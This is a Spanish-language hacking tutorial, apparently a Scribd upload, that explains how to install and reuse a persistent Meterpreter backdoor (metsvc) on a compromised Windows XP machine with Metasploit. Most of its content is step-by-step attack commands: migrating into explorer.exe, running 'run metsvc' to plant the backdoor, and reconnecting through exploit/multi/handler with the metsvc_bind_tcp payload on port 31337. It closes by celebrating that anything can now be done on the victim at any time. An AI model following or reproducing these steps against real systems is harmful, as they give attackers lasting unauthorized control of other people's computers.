Scribd Logo
Hochladen

Willkommen bei Scribd!

  • Backdoor en Meterpreter

    Hochgeladen von

    Arles Alvarez
    33 Ansichten10 Seiten

    Copyright

    © © All Rights Reserved

    Verfügbare Formate

    PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden

    Copyright:

    © All Rights Reserved
    Als PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    33 Ansichten10 Seiten

    Backdoor en Meterpreter

    Hochgeladen von

    Arles Alvarez

    Copyright:

    © All Rights Reserved
    Als PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 10

    Instalar y acceder a un Backdoor (Troyano)

    en Meterpreter

    (Ataque con Metasploit Framework)
    Por:
    Prateek Shukla (PS)
    (CISE, C|EH, E|CSA, BCSE)

    Traducido al Espaol por:

    Bryan aka Asp1r3-At0m

    Social Network: - www.facebook.com/pratikshukla123
    www.facebook.com/officialprateekshukla
    Web: - www.hackingwithprateek.in




    Introduccin:

    Muchas veces es una buena idea dejar una algo en la maquina
    comprometida que nos haga ms fcil volver a entrar a ella,
    debido a que si el servicio fue parcheado, todava tienes acceso al
    sistema. Es aqu donde Metsvc elaborado por Alexander Sotirovs
    llega a la escena y hace poco fue agregado al proyecto Metasploit
    Framework. Metsvc es un servicio de red que sirve de envoltura
    para Meterpreter. Puede ser usado como un servicio de Windows
    o ser ejecutado como una aplicacin por la lnea de comandos.
    Usando este backdoor se puede obtener una Shell en Meterpreter
    en cualquier punto. Metsvc, como es demostrado aqu no requiere
    autenticacin. Esto significa que cualquiera que pueda acceder al
    puerto especificado, podr obtener el control del Backdoor. Esto
    no es bueno si est haciendo un test de penetracin, debido a que
    podra suponer un pequeo riesgo. En una situacin real, usted
    podra alterar el cdigo para obtener algn tipo de autentificacin
    o filtrar las conexiones a dicho puerto por diversos mtodos.

    Materiales requeridos:
    Backtrack 5 (R1/R2/R3) en la maquina del atacante.
    Windows XP en la maquina vctima.
    IP de la maquina vctima.



    Explotacin


    Entonces, manos a la obra!
    Podemos iniciar Metasploit Framework desde el men de
    aplicaciones o desde la lnea de comandos. Para iniciarlo desde el
    men vamos a:
    Applications BackTrack Exploitation Tools
    Network Exploitation Tools Metasploit Framework
    msfconsole






    Primero, explotamos la maquina remota:


    Usaremos el comando: ps para ver la lista de procesos.

    Tan pronto como usemos el comando, la lista de procesos
    aparecer en la pantalla, y entonces migraremos a explorer.exe
    escribiendo el comando: migrate 1472, esto para que en caso de
    que el servicio explotado no responda y el usuario de la maquina
    infectada decida terminarlo.
    Nota: El id de mi proceso es 1472, en sus computadoras puede ser
    otro.


    Bien!! Hemos logrado migrarlo a explorer.exe.
    Ahora es hora de empezar el verdadero trabajo, instalar el
    backdoor en la maquina vctima.
    Para instalar el backdoor utilizaremos el siguiente comando:

    run metsvc

    Si tenemos suerte y todo ha salido bien, aparecer como en la
    imagen que hemos instalado con suerte el server.



    Ahora, busquemos nuestro backdoor en la maquina victima en la
    carpeta llamada BNUhuhnG en el directorio Temp de
    C:\WINDOWS.


    Ahora veamos el backdoor original en la carpeta, podemos ver la
    dll y los archivos .exe


    Ahora, luego de tener el backdoor listo en la maquina vctima,
    reiniciar la maquina vctima, con el fin de comprobar si el
    backdoor funciona o no.


    Ahora verificaremos que ha sido efectivo y entraremos en la
    maquina victima de nuevo, ahora usaremos multi-handler con un
    payload.
    use exploit/multi/handler/

    Cuando hemos establecido el exploit, es hora de establecer el
    payload
    set PAYLOAD Windows/metsvc_bind_tcp

    Ahora revisemos todos los campos que nos dan en el comando
    show options.

    Ahora es necesario especificar el RHOST y RPORT para poder
    acceder a la maquina vctima. Ajustamos RHOST a 192.168.2.9 y
    RPORT a 31337. La razn de porque estoy usando ese puerto se
    debe a que ese puerto es utilizado para todos los servicios del
    backdoor. Si usramos otro puerto diferente, este no creara una
    sesin en Meterpreter cuando usamos el comando exploit.

    Ahora viene el paso final, volver a obtener la sesin de
    Meterpreter, eso es simple, solo necesitamos usar el comando:
    Exploit

    Y aqu vamos de nuevo, el ataque result un completo xito y
    obtuvimos la sesin como antes. Ahora en el Administrador de
    Tareas de Windows, podemos ver el proceso de meterpreter-
    server.exe siendo ejecutado en la maquina vctima.


    Genial!! Ahora podemos acceder a la maquina infectada en
    cualquier momento y mientras la sesin de Meterpreter est
    abierta, podemos hacer lo que sea en la maquina vctima.

    Espero que les hay gustado.

    Das könnte Ihnen auch gefallen